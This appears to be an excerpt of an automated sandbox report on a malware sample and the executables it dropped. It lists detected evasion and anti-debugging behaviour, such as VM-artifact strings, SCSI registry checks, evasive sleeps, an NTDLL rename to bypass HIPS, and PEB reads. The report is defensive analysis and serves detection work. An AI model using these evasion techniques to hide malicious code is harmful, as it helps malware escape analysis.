Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: 66A4.exe PID: 3536, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: C5EA.exe, 00000012.00000002.379102872.00000000006BB000.00000004.00000020.sdmp Binary or memory string: ASWHOOK
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLUSER
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\cnv622JnZv.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\cnv622JnZv.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\cnv622JnZv.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\cnv622JnZv.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\cnv622JnZv.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\cnv622JnZv.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8615.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8615.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8615.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8615.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8615.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8615.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B084.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\B084.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\B084.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\B084.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\B084.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\B084.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Renames NTDLL to bypass HIPS
Source: C:\Users\user\AppData\Local\Temp\8615.exe File opened: C:\Windows\SysWOW64\ntdll.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8615.exe File opened: C:\Windows\SysWOW64\ntdll.dll Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\977B.exe TID: 5728 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\152F.exe TID: 4988 Thread sleep time: -90000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\977B.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 571 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 375 Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A6B90 rdtsc 24_2_6B4A6B90
Source: C:\Users\user\AppData\Local\Temp\977B.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000006.00000000.294735709.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: explorer.exe, 00000006.00000000.295034386.0000000008AEA000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.281531555.0000000008C5B000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.270174093.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: vmware
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: VMwareVBoxARun using valid operating system
Source: 152F.exe, 00000023.00000003.505077428.0000000002EEE000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWL
Source: 152F.exe, 00000023.00000003.505458126.0000000002F11000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000006.00000000.269637468.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000006.00000000.309552971.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
Source: explorer.exe, 00000006.00000000.270552390.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000006.00000000.309552971.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
Source: C:\Users\user\Desktop\cnv622JnZv.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_004040F0 RegCreateKeyExA,RegOpenKeyExA,GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetSystemMetrics, 34_2_004040F0
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_0041B9B2 FindFirstFileExW, 34_2_0041B9B2
Source: C:\Users\user\Desktop\cnv622JnZv.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging:

barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\cnv622JnZv.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8615.exe System information queried: CodeIntegrityInformation Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 0_2_00427590 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00427590
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 0_2_02EBD727 push dword ptr fs:[00000030h] 0_2_02EBD727
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 17_2_02BA0042 push dword ptr fs:[00000030h] 17_2_02BA0042
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47F340 mov eax, dword ptr fs:[00000030h] 24_2_6B47F340
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47DB40 mov eax, dword ptr fs:[00000030h] 24_2_6B47DB40
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548B58 mov eax, dword ptr fs:[00000030h] 24_2_6B548B58
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A3B5A mov eax, dword ptr fs:[00000030h] 24_2_6B4A3B5A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A3B5A mov eax, dword ptr fs:[00000030h] 24_2_6B4A3B5A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A3B5A mov eax, dword ptr fs:[00000030h] 24_2_6B4A3B5A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A3B5A mov eax, dword ptr fs:[00000030h] 24_2_6B4A3B5A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47F358 mov eax, dword ptr fs:[00000030h] 24_2_6B47F358
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A3B7A mov eax, dword ptr fs:[00000030h] 24_2_6B4A3B7A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A3B7A mov eax, dword ptr fs:[00000030h] 24_2_6B4A3B7A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B506365 mov eax, dword ptr fs:[00000030h] 24_2_6B506365
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B506365 mov eax, dword ptr fs:[00000030h] 24_2_6B506365
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B506365 mov eax, dword ptr fs:[00000030h] 24_2_6B506365
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53131B mov eax, dword ptr fs:[00000030h] 24_2_6B53131B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52E33D mov eax, dword ptr fs:[00000030h] 24_2_6B52E33D
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B504320 mov eax, dword ptr fs:[00000030h] 24_2_6B504320
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F53CA mov eax, dword ptr fs:[00000030h] 24_2_6B4F53CA
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F53CA mov eax, dword ptr fs:[00000030h] 24_2_6B4F53CA
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49DBE9 mov eax, dword ptr fs:[00000030h] 24_2_6B49DBE9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B471BE9 mov eax, dword ptr fs:[00000030h] 24_2_6B471BE9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4723F6 mov eax, dword ptr fs:[00000030h] 24_2_6B4723F6
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5223E3 mov ecx, dword ptr fs:[00000030h] 24_2_6B5223E3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5223E3 mov ecx, dword ptr fs:[00000030h] 24_2_6B5223E3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5223E3 mov eax, dword ptr fs:[00000030h] 24_2_6B5223E3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B483BF4 mov eax, dword ptr fs:[00000030h] 24_2_6B483BF4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B483BF4 mov ecx, dword ptr fs:[00000030h] 24_2_6B483BF4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52D380 mov ecx, dword ptr fs:[00000030h] 24_2_6B52D380
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B474B94 mov edi, dword ptr fs:[00000030h] 24_2_6B474B94
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53138A mov eax, dword ptr fs:[00000030h] 24_2_6B53138A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B51EB8A mov ecx, dword ptr fs:[00000030h] 24_2_6B51EB8A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B51EB8A mov eax, dword ptr fs:[00000030h] 24_2_6B51EB8A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B51EB8A mov eax, dword ptr fs:[00000030h] 24_2_6B51EB8A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B51EB8A mov eax, dword ptr fs:[00000030h] 24_2_6B51EB8A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548BB6 mov eax, dword ptr fs:[00000030h] 24_2_6B548BB6
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4BAD mov eax, dword ptr fs:[00000030h] 24_2_6B4A4BAD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4BAD mov eax, dword ptr fs:[00000030h] 24_2_6B4A4BAD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4BAD mov eax, dword ptr fs:[00000030h] 24_2_6B4A4BAD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B549BBE mov eax, dword ptr fs:[00000030h] 24_2_6B549BBE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B531BA8 mov eax, dword ptr fs:[00000030h] 24_2_6B531BA8
